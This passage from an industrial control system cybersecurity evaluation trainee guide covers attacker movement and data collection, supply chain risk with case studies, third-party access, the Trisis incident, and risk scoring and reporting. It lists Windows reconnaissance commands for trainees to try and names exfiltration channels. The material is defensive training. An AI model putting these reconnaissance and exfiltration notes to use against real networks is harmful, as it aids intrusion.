With VPN credentials the attacker comes in through the front door like any user and have immediate
access to network resources.
Remote Desktop refers to a type of software that allows the access to a remote system. In Windows,
the remote desktop application is mstsc.exe. The attacker can possibly use Remote Desktop
connections on a victim host to access other hosts hiding their access in the “normal” network traffic.
Virtual Network Computing is a Remote Desktop application that is used to remotely control another
host. VNC is platform-independent – there are clients and servers for many GUI-based operating
systems. VNC is inherently unsecure, and data that is being sent across the network can be sniffed and
pieced together by anyone with the correct tools and knowledge. Many component HMI’s have VNC
servers built in that can be accessed from anywhere on the network.
An attacker can create malware tainted documents and programs that could be placed on shared
drives that other uses would consider as safe to open and use.
It is also possible that trusted removable media could be utilized by an attacker to exploit other systems
 Local host data

 ___________________________________
 ___________________________________
 ___________________________________
 ___________________________________
 ___________________________________
 Shared network resources
 Removable media
 Email
 ___________________________________
 ___________________________________
Attackers will scour each compromised host for any and all documents and files that may help them
meet their goals. These can include:
Documents and other files
Screenshots
Audio / webcam captures
Keyboard keylogging
Application history information (web browser, chat, histories, etc.)
Email message contents
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
161 | P a g e
Contact data
Shared document repositories (e.g., shared drives and cloud services such as OneDrive,
SharePoint, and Goggle Drive)
Listed below are some commands you can try:
 netstat – Network connections
 ipconfig
 route
 dir – Directory listings
 systeminfo – System information
 net – Network information
o net view
o net use
o net user
o Other net options
 Sc – Service control manager
 Other Windows / DOS commands
 Some methods and techniques

 Use of common ports:
 ___________________________________
 ___________________________________
 ___________________________________
 ___________________________________
 ___________________________________
 DNS over HTTPS
 Removable media
 VPN
 Legitimate web servers
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
162 | P a g e
 Some methods and techniques
 ___________________________________
 ___________________________________
 ___________________________________
 ___________________________________
 ___________________________________
 Bad public relations and loss of credibility

 Data destruction
 Denial of service
 Loss of proprietary information
 Loss of revenue
 Physical equipment destruction
 Loss of life
Additional Resources
MITRE ATT&CK® Knowledge Base
• Pre-Att&ck Matrix
o https://attack.mitre.org/matrices/prep
• Enterprise Matrix
o https://attack.mitre.org
• Industrial Control System Matrix
o https://collaborate.mitre.org/attackics/index.php/Main_Page
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
163 | P a g e
Adversarial risk recap
When conducting an evaluation, the following questions can be asked:
 Have employees been trained in identifying phishing emails?
 What host information can an aggressor find that can help identify potential high-value targets?
 What documentation is available on a network that contain 'sensitive' ICS network and/or ICS
device information?
 No general cybersecurity awareness training – staff are not receiving cybersecurity awareness
training
 Multi-use systems – Particular host is used to perform multiple tasks that increase risk because
of the multiple resources they access.
 Systems diagrams and documentation is missing/incomplete
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
164 | P a g e
Assess supply risk
Continuing with assessing risk to the business, we will now assess risk to supply chain.
Why attack the supply chain?
Why pay attention to supply chain risks? Attacks on a supply chain can compromise an organization’s
operations unnoticed. Supply chain attacks can be done without a vendor’s knowledge, especially in
today’s environment because vendors
do not make the physical equipment
anymore – it is typically outsourced.
Types of attacks:
 Shipment intercept
 Hardware or hardware
manipulation
 Manufacturing
 Misconfiguration
(intentional / unintentional)
Vulnerabilities
There are multiple risks in supply chains. Listed here are some aspects of the supply chain.
 Design – Vulnerabilities introduced during Design are often unintentional and can affect all
users of the components. Malicious actors could build vulnerabilities into components, which
could then be installed in millions of pieces of equipment.
 Development and Production – Vulnerabilities introduced during this phase are often
inadvertent and can be costly to fix if not identified during prototype testing. Well-designed
products may still have malicious components introduced during manufacturing and assembly in
a way that could be difficult to identify.
 Distribution – Components transported between production facilities and customers often do
not fall under the purview of the personnel responsible for design or production. Vulnerabilities
introduced during Distribution are likely to be malicious and affect a limited number of
components and customers, as compared to earlier phases.
 Acquisition and Deployment – Malicious insiders may insert vulnerabilities or replace
equipment with vulnerable components during acquisition or installation. Vulnerabilities
introduced during this phase likely affect a limited number of customers.
 Maintenance – ICT components receiving Maintenance are susceptible to vulnerabilities
introduced through physical or network access, and from exploitation of previously unknown or
unpatched vulnerabilities. Vulnerabilities introduced during Maintenance might be targeted
against specific entities but can affect many customers in the case of software updates.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
165 | P a g e
 Disposal – ICT components that are improperly disposed of can contain sensitive company or
customer data. Malicious actors can also attempt to refurbish components and try to resell them
as new. Used parts may be less reliable and prone to failure, or have malware installed.
Supply chain NIST draft 8276
The National Institute of Standards of Technology (NIST) cyber supply chain risk management (C-
SCRM) program was initiated in 2008 to begin the development of C-SCRM practices for non-national
security systems in response to Comprehensive National Cybersecurity Initiative (CNCI) #11: Develop
a multi-pronged approach for global supply chain risk management. Over the past decade, NIST has
continued to develop publications and conduct further research on industry best practices for C-SCRM.
This document presents Key Practices and recommendations that were developed as a result of the
research conducted in 2015 and 2019, including expert interviews, development of case studies, and
analysis of existing government and industry resources.
Key practices per the NIST 8276 draft
 Integrate C-SCRM across the organization
 Establish a formal program
 Know and manage your critical suppliers
 Understand your supply chain
 Closely collaborate with your key suppliers
 Include key suppliers in your resilience and improvement activities
 Assess and monitor throughout supplier relationship
 Plan for the full life cycle
Sample recommendations from NIST 8276
 Establish a supply risk council
 Create explicit collaborative roles
 Integrate cybersecurity considerations into the system and product life cycle
 Clearly define roles for security aspects of supplier relationships
 Use requirement lists and SLA’s for requirements with suppliers
 Propagate security requirements to suppliers’ sub-suppliers
 Know if your data and infrastructure are accessible to suppliers’ sub-suppliers
 Include key suppliers in incident response, and business continuity.
 Collaborate on lessons learned.
 Have plans in place for supplied product obsolescence.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
166 | P a g e
Each key practice includes several recommendations, which synthesize how these practices can be
implemented from a people, process, and technology perspective.
NOTE: See NIST Document for complete list.
Considerations
Use cases
A Chinese manufacturer that sells the popular devices for scanning items shipped or transported
apparently has been implanting the malware in its products, as well as via the Windows XP embedded
version of the software on the scanner maker's support website. Researchers from TrapX Security,
which today provided details of the attacks, say scanners with another variant of the same malware
were also sold to a large robotics firm and seven other companies, which they did not name.
https://www.darkreading.com/attacks-breaches/chinese-hackers-target-logistics-and-shipping-firms-
with-poisoned-inventory-scanners/d/d-id/1297182
In 2011, the Senate Armed Services Committee (SASC) investigated the problem of counterfeits in the
DOD supply chain. One of the examples cited in the SASC’s report were counterfeit integrated circuits
(IC), in an ice detection module found on the Navy’s P-8A Poseidon airplane. The P-8A is a modified
Boeing 737 that incorporates anti-submarine and anti-surface warfare capabilities. After the Navy
purchased the aircraft from Boeing, the manufacturer of the ice detection system, BAE Systems,
discovered the IC’s were counterfeit. Upon further examination it was concluded the IC’s had been
sanded down, resurfaced, and remarked to appear new. When traced back through the supply chain, it
was found that BAE purchased the components from a U.S. supplier. However, the U.S. supplier
originally purchased the IC’s from a company in Shenzhen, China.
https://medium.com/homeland-security/americas-military-breached-by-counterfeit-electronics-
12dc207f257c
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
167 | P a g e
Supply chain exercise
Goal: Identify supply chain threats from the articles below. Brainstorm other possible
threats that could be possible.
Article 1 – Chinese Hackers Target Logistics & Shipping Firms with Poisoned Inventory
Scanners
By Kelly Jackson Higgins
https://www.darkreading.com/attacks-breaches/chinese-hackers-target-logistics-and-shipping-firms-
with-poisoned-inventory-scanners/d/d-id/1297182
'ZombieZero' still actively pushing rigged handheld scanning devices, reviving concerns of doing
business with Chinese tech companies.
Malware-poisoned handheld inventory scanners from China are stealing information from logistics and
shipping firms as well as manufacturing companies around the globe in an attack campaign dubbed
"ZombieZero" by the researchers who discovered it.
A Chinese manufacturer that sells the popular devices for scanning items shipped or transported
apparently has been implanting the malware in its products, as well as via the Windows XP embedded
version of the software on the scanner maker's support website. Researchers from TrapX Security,
which today provided details of the attacks, say scanners with another variant of the same malware
were also sold to a large robotics firm and seven other companies, which they did not name.
Logistics firms use the scanners to track shipments as they are loaded and unloaded from ships,
trucks, and airplanes.
"The attackers were exfiltrating all [stolen information] to a database," says Carl Wright, general
manager of TrapX. "They are very focused on manifests -- what's in it, what's the value of it."
168 | P a g e
Once the scanner is connected to the victim's wireless network, it attacks the corporate network via the
server message block (SMB) protocol, and the scanned information, including origin, destination,
contents, value, and shipper and recipient information, is sent to a botnet that terminates at the
Lanxiang Vocational School purportedly located in the Shangdong province in China. The school has
been linked to the infamous Operation Aurora cyber espionage campaign that hit Google, Adobe, Intel,
and many other major U.S. firms more than four years ago and is located one block from the inventory
scanner manufacturer in question, according to TrapX.
The botnet then sends the scanner a second piece of malware that targets the victim's corporate
financial, customer, shipping, and manifest information. "That was able to take control of the ERP
[enterprise resource planning] system," Wright says. This would, among other things, allow the attacker
to make a package "disappear" or "reappear," he said. The attack targets a specific, major ERP
system, says Wright, who declined to reveal the name of the product due to an investigation into the
attacks.
Wright says it is difficult to discern if the attackers are after the logistics firms themselves or their
customers.
"The exfiltration of all financial data as well as CRM data was achieved providing the attacker complete
situational awareness and visibility into the shipping and logistics targets worldwide operations," TrapX
said in a report it published today on the attacks.
Some supply chain threats from this article include:
• Buying devices with Malware already installed.
• What access the scanners have across the network
• Download of Windows XP embedded from their website
• The view into shipping and logistics operations
Article 2 – America’s Military Breached by Counterfeit Electronics
https://medium.com/homeland-security/americas-military-breached-by-counterfeit-electronics-
12dc207f257c
In 2016, the U.S. allocated $598 billion to defense spending. A substantial portion of the funding went
towards defense systems and equipment that contain electronic components critical to the success of
our warfighter’s mission. Due to the defense systems dependence on these electronic parts and the
ever-shortening life cycles of electronic components, the DOD supply chain is highly susceptible to the
introduction of counterfeits. The presence of counterfeit electronic components can be seen through
several different sources.
Background
In 2011, the Senate Armed Services Committee (SASC) investigated the problem of counterfeits in the
DOD supply chain. In so doing it identified vulnerabilities throughout the supply chain that allowed
counterfeit parts to infiltrate crucial defense systems, thereby risking national security and the lives of
those who protect it. The investigation further identified that 70% of all counterfeits come from China,
and a majority of the remaining counterfeits could be traced back through the supply chain to China.
One of the examples cited in the SASC’s report were counterfeit integrated circuits (IC), in an ice
detection module found on the Navy’s P-8A Poseidon airplane. The P-8A is a modified Boeing 737 that
incorporates anti-submarine and anti-surface warfare capabilities. After the Navy purchased the aircraft
from Boeing, the manufacturer of the ice detection system, BAE Systems, discovered the IC’s were
counterfeit. Upon further examination it was concluded the IC’s had been sanded down, resurfaced,
169 | P a g e
and remarked to appear new. When traced back through the supply chain, it was found that BAE
purchased the components from a U.S. supplier. However, the U.S. supplier originally purchased the
IC’s from a company in Shenzhen, China.
The technique of resurfacing electronic components was highlighted by the Institute of Electrical and
Electronics Engineers (IEEE) in an article titled Response to Counterfeit IC’s in the Supply Chain, in its
2008 Annual Technology Report. The report found that historically counterfeits were “clones” or copies
of high value components; however, with the maturing of the electrical industry coupled with the
increasing number of obsolete units, opportunities for counterfeiters have expanded. This has allowed
for the use of traditional counterfeiting methods which include remarking the product type or speed of
high-end components.
Another indicator of the prevalence of counterfeit components is the scope of enforcement efforts that
have been initiated to identify and interdict these bogus parts. Two of the initial efforts included
operations “Cisco Raider” and “Network Raider” as identified by the Federal Bureau of Investigation
(FBI). These actions specifically targeted counterfeit network hardware, to include network routers,
switches, network cards and modules manufactured by Cisco and other well-known companies. Both
efforts were international multiagency efforts that include the FBI, Homeland Security Investigations
(HSI), Customs and Border Protection (CBP), Royal Canadian mounted Police (RCMP), Canadian
Border Services Agency (CBSA), Defense Criminal Investigative Service (DCIS) and the Internal
Revenue Service (IRS). These two efforts alone resulted in the issuance of more the 35 search
warrants, 40 convictions and the seizure of $220 million in counterfeit network hardware.
Response
Due to the breadth of the infiltration and potentially devastating consequences congress, law
enforcement and industry partners have undertaken multiple efforts to combat this problem.
In 2012, congress introduced a bipartisan amendment to the National Defense Authorization Act
(NDAA). The intent of the amendment was to stop the importation of counterfeit electronic parts into the
U.S. through the following measures: addressing weaknesses in the defense supply chain,
implementing aggressive counterfeit avoidance practices across the entire defense industry, and
actually defining what constituted a counterfeit or suspected counterfeit part.
While the amendment was passed in 2011, it wasn’t until the final rule was issued in 2014, that the
Defense Federal Acquisition Regulation Supplements (DFARS) were changed to include the following;
the definitions for counterfeit electronic part, suspect counterfeit part, electronic part and obsolete
electronic part; the required reporting of counterfeit or suspect parts would be done through the
Government-Industry Data Exchange Program (GIDEP); mandated that contractors and subcontractors
have a review/detection process in place to identify counterfeit/suspect parts; and that contractors and
subcontractors would not be held civilly liable for the reporting of counterfeit parts.
In 2011, the National Intellectual Property Rights Coordination Center (NIPRCC) initiated Operation
Chain Reaction (OCR), a joint taskforce initiative comprised of sixteen law enforcement agencies.
While there were efforts by individual agencies to identify and interdict counterfeit items entering the
federal supply chain, OCR was the first time that IPR Center members had collectively addressed the
issue. Since its inception OCR has resulted in numerous arrests, convictions, and the forfeiture of
millions of dollars. As a result, OCR was cited in the Joint Strategic Plan on Intellectual Property
Enforcement.
In 2015, the Counterfeit Avoidance Accreditation Program (CAAP) was developed through industry
efforts to mitigate the risk of introducing counterfeit parts into the supply chain for the aviation, space,
and defense industries. The program uses a managed approach that brings together technical experts
170 | P a g e
from both industry and government, to ensure compliance with the standards associated with the
prevention and detection of counterfeit parts. Industry partners work together to define operational
program requirements, establish requirements for accreditation and grant accreditation. On March 2,
2017 Rockwell Collins become the first company in the world to achieve CAAP accreditation for its
supply chain management procedures.
Some supply chain threats from this article:
• Counterfeit devices in industry
• Knowing what your supply chain includes
• Have a program to look at supply chain
• Lacking a procedure for when this might happen
Exercise Notes:
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
171 | P a g e
Third-party access
Third-party access is an import aspect for ICS
or OT systems. Third-party access is defined
as a vendor or contractor that needs access to
a local site or remote site ICS system. This
access may be for maintenance, upgrades,
administration, etc.
First, we need to look at considerations for
access – that is, why does the contractor or
vendor need access to the ICS network? Most
of this revolves around who maintains the
systems for your organization.
 So, we need to ask:
 ________________________________?
o First, we need to verify the purpose of third-party access.
o Is it the vendor or a contractor working on the equipment?
o It is important third-parties are safe when they come onsite, and some sites require they
have a good safety record. Make sure you know what is required before contractors/vendors
are scheduled for access.
Training. Training when coming onsite is also important. What is needed for access?
Contractors/vendors will need to understand your network layout and what they will have access to.
Make sure you understand the Management of Change (MOC) process.
What in your site network segmentation is important for these third-parties to understand? How do
you protect other systems both logically and physically?
How will third-parties be monitored? What do you have in place to keep an eye on their activities?
Always insist on knowing precisely what they are working on and how changes could affect systems.
Onsite access
It is also important to inform third-parties of policies that affect access to the systems. Be very careful
with any outside hardware that needs to be attached to your system. Be sure to properly vet outside
hardware, and ensure it is secure (up-to-date AV, no dual homing, up-to-date patching, and scanned
before attaching to the network or device). Never connect an outside laptop to your network unless it is
secured.
Only allow what is really needed. Do not give full network or physical access to third-parties if they do
not need it. Only allow a limited user account for system access.
Third-parties need to be overseen by ICS staff onsite. If they need to work off hours, allowances can be
made and signed for by management. This should all be well documented and allow for no changes
without ICS management staff onsite. Third-parties should be escorted onsite unless they are properly
trained for a site emergency.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
172 | P a g e
Remote access
Third-party remote access did not used to be a big issue. Now we need to plan for remote access to
everything. Remote access is a risk that should not be taken lightly. For a contractor/ vendor to need
remote access to an ICS system, there needs to be significant security in place.
Best practice is to always avoid remote access whenever possible. When considering third-party
remote access, start by asking why the third-party needs network access, and if there is a reasonable
alternative. If remote access is required, always ensure there are strong security policies in place to
protect your organization’s interests, and that those policies are enforced.
Network access:
 What is needed to get the work done?
 How is the access granted?
 Who is in control of the access?
 Authentication – multi-factor?
 Jump box in the DMZ
 Hours allowed to access the system
 How are you going to monitor the connection (logging, IDS)?
 VPN / connection policy
 Remote computer security policy verification
 What does the connection have access to on the network (only necessary access)?
Third-party access use case – Trisis
What: An oil and gas plant in Saudi Arabia
Event: In late August 2017, Trisis malware infected ICS computers
Impact: Complete shutdown of the entire facility
Specifics: trilogy.exe program along with Library.zip were download to the affected computers. Can
cause problems with an SIS system. Could have been spread by USB or email.
Lessons learned:
 SIS systems need to be isolated
 This could have been much worse, but the actor made a mistake in the code
 Could easily be installed at the vendor level before installation at the site
 Scan all computers
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
173 | P a g e
Third-party exercise questions
Look at the situation below and answer the questions.
The Acme Company has an oil refinery in the U.S. A vendor has installed
some new equipment to load material from one refinery unit to another. They
would like to set up remote support for this equipment to maintain and check
problems while the equipment is in operation.
1. Who is responsible for handling this request?
2. What questions would you ask of the vendor before considering this request?
3. What mitigation would you put in place if remote access is required to have support from this
vendor?
Potential exercise answers:

1. Probably the Unit planners and Process Control
2. What is your remote connection support policy? Do you AV scan and keep your computers up to
date? Did you sign the SLA?
3. Some compliance checks on the VPN. Two-factor authentication. Developed policy for remote
access. DMZ to connect through.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
174 | P a g e
Supply chain recap
 Does the organization verify purchases from well-known vendors? Is documentation in place
how it was verified?
 Is there a process for vetting vendors? How do you ensure they are cyber-aware and safe?
 The organization knows what current vendors use, and if access is allowed?
 System has multiple remote access options
 No process governing the implementation of remote access
 NAC/NAP
 Direct VPN Access to SCADA
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
175 | P a g e
Critical Risk
Critical risk
TRAINEE GUIDE
Outcomes
In this section we will discuss how to determine what issues collected throughout the evaluation are
of critical risk to your business.
176 | P a g e
Evaluate risk management and mitigation approaches
Our purpose here is to crystallize recommendations from the issues collected throughout the evaluation
process. It is very important to understand that as evaluators we are not doing the work but
recommending solutions that can/should be deployed.
As such, the below image represents the four main portions of how to identify, prioritize, manage, and
report risk. This section will show how to fill in the Findings Report so there is a paper trail to document
and show follow through on all actions.
 Define and frame  Prioritize overall risk

business risk based on critical
issues (findings)
 Bound risk based on
documented issues
 Determine individual
issue risk
 Create evaluation
 Recommend a risk
report
management
approach for each
finding
Business risk
Risk Management:
 Risk: ____________________________________________________________________.
 Risk assessment:
____________________________________________________________________.
 Risk management:
____________________________________________________________________________
__________________________.
NOTE: Risk assessment and risk management are continuous processes.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
177 | P a g e
Frame Business Risk:
 How does an organization view risk in
a business context?
 What is the environment in which
risk decisions are made?
 What is the organization’s overall risk-
management strategy?
 How does the organization
assess, respond, and monitor
risk?
Framing organizational risk in context of an ICS cybersecurity evaluation:
Recommend resources for each finding:

 Define and recommend roles/responsibilities for risk management
 Identify primary and secondary points of contact (POC) for mitigation of each finding
The next step is to identify potential resources in order to assign resolution of the issue. You should be
very aware of the potential players needed to resolve these issues. This becomes even more important
considering the final resolution for risk management will need to involve collaboration with these
individuals. Further, these individuals will likely be the ones responsible for issue/finding resolution, as
the evaluator’s job likely ends after recommendation.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
178 | P a g e
Determining ICS cybersecurity risk
It is important to note that each of these are scoring methods based on available evidence, experience,
and/or expert judgment.
It is also very important that evaluators understand this is not an exact science, and sometimes risk is a
squishy assumption. This is the other reason why it is important to provide outside evidence to
management on conclusions that recommendations are reliable, valid, and practical.
In addition, as your recommendations for risk management become more predictable and based on
standardization evaluators, those recommendations are more likely to accomplish cybersecurity goals.
The Cyber Security Evaluation Tool (CSET®) provides a systematic, disciplined, and repeatable
approach for evaluating an organization’s security posture. CSET® is a desktop software tool that
guides asset owners and operators through a step-by-step process to evaluate industrial control system
(ICS) and information technology (IT) network security practices. Users can evaluate their own
cybersecurity stance using many recognized government and industry standards and
recommendations.
The CSET® Download has moved to GitHub: https://github.com/cisagov/cset/releases
You can also find older legacy versions of the software on GitHub
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
179 | P a g e
Consequence-driven Cyber-informed Engineering
(CCE) is a guided methodology for operators to identify
key points vulnerable to a cyberattack. CCE provides a
method to discover information needed to calculate
operational cyber risk. It is focused on engineered
solutions designed to disrupt a physical cyberattack.
The phases of CCE are:
1. Consequence prioritization
2. System-of-systems breakdown
3. Consequence-based targeting
4. Mitigations and protections
Basic risk method

 Determine likelihood and impact
 Determine individual risk for each issue; reveal critical
risk
 Provide recommended actions (mitigations) for findings
(critical-risk issues)
When dealing with an ICS cybersecurity evaluation, or any
other topic that could be considered outside the business
realm, it is important to help evaluators speak to the business issue. Specifically, here, it is important an
evaluator be able to provide leadership (business decision-makers) with quantifiable, or as close to
quantifiable as possible, metrics from which business decisions can be made. The best practice in
industry for risk management, is to determine likelihood (probability of occurrence of the issue) and
then to determine impact (severity of loss to the business if event occurs).
 Likelihood (probability of occurrence)
 Represented in non-statistical sense (i.e., is not an exact number)
 Probability a threat exploits a vulnerability exposing risk
 Defined as qualitative based on evidence, experience, and expert judgment
 Impact (severity of loss to business based off criticality)
 Amount of loss resulting from a threat exploiting a vulnerability
 Based on available evidence, experience, and expert judgment
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
180 | P a g e
 Identifies the severity of a loss based internal and external variables
 Risk prioritized by impact to business-critical functions
 Qualitative vs. quantitative
Example of issue listed in an issues and findings report
 Likelihood (probability of occurrence)
 Moderate (low to medium) risk remote exploit occurs
 Based on medium risk, likelihood score for this issue is a 5
Control NIST 800-53Control Family Issue Discovery Risk
Remote access can Remote access can grant

grant malicious malicious individuals
Network - Remote
AC-17(3) System has multiple remote access options individuals persistence persistence and ease of
Access
and ease of access to access to company
company resources. resources.
 Impact (severity of loss to business/mission)

 High – if someone were to access ICS remotely, severe problems could occur
 Based on a high risk, impact score for this issue is a 9
 Verify impact is conditioned, ranked, and assigned based on impact to business-critical
function.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
181 | P a g e
Issue graphing
This is a heat map showing each issue found in the evaluation process mapped in a graph. The graph
takes the overall likelihood and overall impact for each issue and maps them. It is called a heat map
because the colors of the graph illustrate the more critical the likelihood and impact are on the system,
the more destructive or “hot” they are considered.
As is shown on the slide, it is important to show, in context, the ranges of likelihood and impact. Most
importantly, we probably don’t want to spend a lot of time producing risk management approaches for
issues that may never happen; or if they did happen, would not result in loss.
The evaluation process should focus on those issues that matter most to the organization/mission
criticality.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
182 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
183 | P a g e
Narrowing focus – Once critical risk is discovered, the focus of evaluation will be to provide
recommended mitigations for findings (yellow). Issues outside the critical risk quadrant of the graph
may also need focus.
Control NIST 800-53Control Family Issue Discovery Risk Recommendation Resource
No Central Account Management System ISSO
No secure remote access architecture. CISO
System has multiple remote access options Information Security Architect
Logs are not retained in a centralized location and analyzed. IT Admistrator
No Authoritative Time Source within system. OT operator
Logs are not kept long enough or data within them is overwritten too fast to be of value Quality Control
No Change management / configuration control process. Systems Engineering
Changes to the system are not tested before put in production. Quality Control
Poor / Non-existant boundary controls. Networking Team
Routable IP Addresses used in Private Network. Networking Team
No process governing the implementation of remote access CIO
No mobile device policy. CIO
Sources:
• NIST SP 800-30 Guide for Conducting Risk Assessments, 2012
• Handbook for Self-Assessing Security Vulnerabilities & Risks of Industrial Control Systems on
DOD Installations, 2012
• NIST SP 800-39; Managing Information Security Risk (Organization, Mission, and Information
System View), 2011
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
184 | P a g e
Step 7 – Recommend
Actions
Identify countermeasures, document
recommendations, update artifacts, final report
TRAINEE GUIDE
Outcomes
In this section we will discuss how to identify countermeasures, document recommendations,
update artifacts, and complete your final report.
185 | P a g e
Step 7 – Recommend actions
From here we move to Step 7, Recommend Actions.
NOTE: In the last step (6) we took
the text straight from the NIST
document and did not tailor to our
specific findings. As such, it is
important to ensure an evaluator
takes the opportunity to verify
recommendations to match the
actual finding risk and risk
mitigation. It is also very important to
collaborate with, meet with, and
discuss with onsite individuals
(and/or those most closely
associated with the finding) to
validate the recommendation before
going into the evaluation report
phase.
Recommend mitigation
Gap current and secure
 Tailor mitigation to meet business need
 Document gap between issue and recommended best practice/regulatory guideline
 Allows for early validation of recommendation
 Validate recommendation
 Practical per-organization criteria
 Feasible (affordable and doable)
 Noting final evaluation report, on horizon, seek to eliminate surprises
 Establish/append supporting ICS cybersecurity documents
 Review cybersecurity documents:
 ICS Cybersecurity Plan
 Previous evaluation reports
 Choose an applicable document to establish mitigation
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
186 | P a g e
Mitigation complete
Now that recommendations include a risk management approach to help resolve the finding, we will
add the final piece of the recommendation for each finding. This recommendation requires the
evaluator to understand an organization’s policies, procedures, and processes. Specifically, it is
important to note that often cybersecurity or security changes are made, and these changes become
one-offs in the solution. To verify our approach to evaluating and resolving critical risk is repeatable
(reliable), has standardized methods and approaches for resolution (standardization), has proven
effective when finding is resolved (validity), and that each recommendation is practical in approach
(both in monetary cost and business opportunity cost). The documents listed here are primarily from the
INL N&HS ICS Cybersecurity Maturity and Competency model, but others are added from additional
best practices.
Complete evaluation recommendations by creating/completing findings and issues report. An example
issues/findings report is available for download in this session.
1. Text that accomplishes risk mitigation
2. Modification or establishing applicable security policies and procedures
Discovery Risk Recommendation Resource
Limit remote access to the control system networks

1 through one highly controlled and monitored network
path, such as VPN connection to a corporate jump
server and remote desktop sessions to a control
Remote access can grant
Remote access can grant malicious system jump server. Do not allow direct
malicious individuals
individuals persistence and ease of communication between the control system network Information Security Architect
persistence and ease of
access to company resources. and any external source, especially the Internet. Follow
access to company resources.
the recommended architecture referenced in the
NCCIC/ICS-CERT defense-in-depth document.
Remote Access Policy
2 ICS Cybersecurity Plan
Evaluation report
This reporting section was added as it is critical to be able in providing a final standardized output for an
evaluation report. These items are all from NIST SP 800-53r4 and are strictly for example purposes.
For purposes of the course evaluation (exercise) phases, the expectation is not that you will need to
complete a final report. This information is added and will be covered briefly so trainees understand this
is the crown jewel of the evaluation. This final report serves as the baseline for future evaluation efforts
in cybersecurity evolution.
Executive summary:
 Date, purpose, scope
 Initial or follow-up
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
187 | P a g e
 Bound evaluation (company-wide, business/mission specific, system specific)
 List critical findings and recommendations
 Describe risk
Body of the report:
 Describe, in full, the purpose of the evaluation (what answers are being sought)
 Identify assumptions and constraints
 Provide a rationale for any risk-related decisions during the evaluation (risk recommendation)
process
 Describe uncertainties with evaluation process
 Describe specific mission/business, organization(s), systems evaluated
 Summarize evaluation results
 Identify time frame of evaluation
 List critical issues that present risk based on adversarial threat
Appendices:
 References
 Team or individuals conducting the evaluation
 Evaluation details to include issues and findings report, other supporting evidence
Sources:
• NIST SP 800-53r4; Security and Privacy Controls for Federal Information Systems and
Organizations (April 2013)
• NIST SP 800-30 Guide for Conducting Risk Assessments, 2012
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
188 | P a g e
Step 8 – Monitor and
Reassess
Continuous monitoring
TRAINEE GUIDE
Outcomes
In this section we will discuss the steps for continuous monitoring.
189 | P a g e
Step 8 – Monitor and reassess
Finally, we move into Step 8, Monitor and Reassess.
Steps for monitoring and reassessing

 Defined system by understanding: (Complete)
o Assets and Business impacts
o Security/Threat/Vulnerability and Risk
 Established metrics/evaluation frequency (Done)
o Process for Evaluation
o Evaluation architecture
 Implement and Analyze - Report (Accomplished)
o Collected data with initial analysis
o Provided report outlining Critical Risk and
Mitigations
 Respond (to findings)
o Handle Critical Risk
 Accept Risk
 Avoid Risk
 Share Risk
 Transfer Risk
 Mitigate Risk
 Review/Update
o Review evaluation processes
o Establish change/configuration management process
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
190 | P a g e
RESPOND
 Responding to ‘Critical Risk’
o Accept – within risk tolerance so (COA): ‘accept’ the risk completely without action
o Avoid – exceeds risk tolerance (COA): ‘avoid’ the risk completely by taking specific
actions
o Share – shifts a portion of risk responsibility (liability) to other organizations
o Transfer – shifts the entire risk to another entity - generally, insurance companies
o Mitigate – ‘risk reduction’; when a ‘portion’ of the risk cannot be accepted, avoided,
shared, or transferred. For example, deploying a common security control for ‘complex’
passwords mitigates risk against potential identity theft.
Review/update
 Establish a Change Management Process
o Assign a Change Management Supervisory Role
o Convene a Change Management Board with all appropriate stakeholders
o Identify, Implement, and Monitor Changes
Change/configuration management process

 Identify / Document:
o Current system/component baseline(s)
o Record requested changes – approved or disapproved
o Build a change management approval process and/or ticketing system
 System and configuration changes implemented:
o Upon majority CM Board Approval with established, regular CM review meetings
o With CM stakeholder assignments to CM review meetings
o Via prepared agendas and minutes
 Stakeholders for change are invited
 Records are kept for disposition on all changes
 Change management requests submitted for:
o Planned adaptations to current system or configuration baselines
o Hot wash (disposition) on unplanned events causing baseline adaptation(s)
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
191 | P a g e
192 | P a g e
Appendix A. Content References
LO1: Discuss components of an ICS evaluation
• Gary Miller, “60% of small companies that suffer a cyberattack are out of business within six
months,” The Denver Post, Oct. 24, 2016 – quoting study by the National Cybersecurity Alliance
• Steve Morgan, “Cyber Crime Costs Projected to Reach $2 Trillion by 2019,” Forbes Jan. 17,
2016
• Verizon, 2016 Data Breach Investigations Report, p. 8-9
• Limor Kessem, “2016 Cybercrime Reloaded: Our Predictions for the Year Ahead,” Jan. 15, 2016
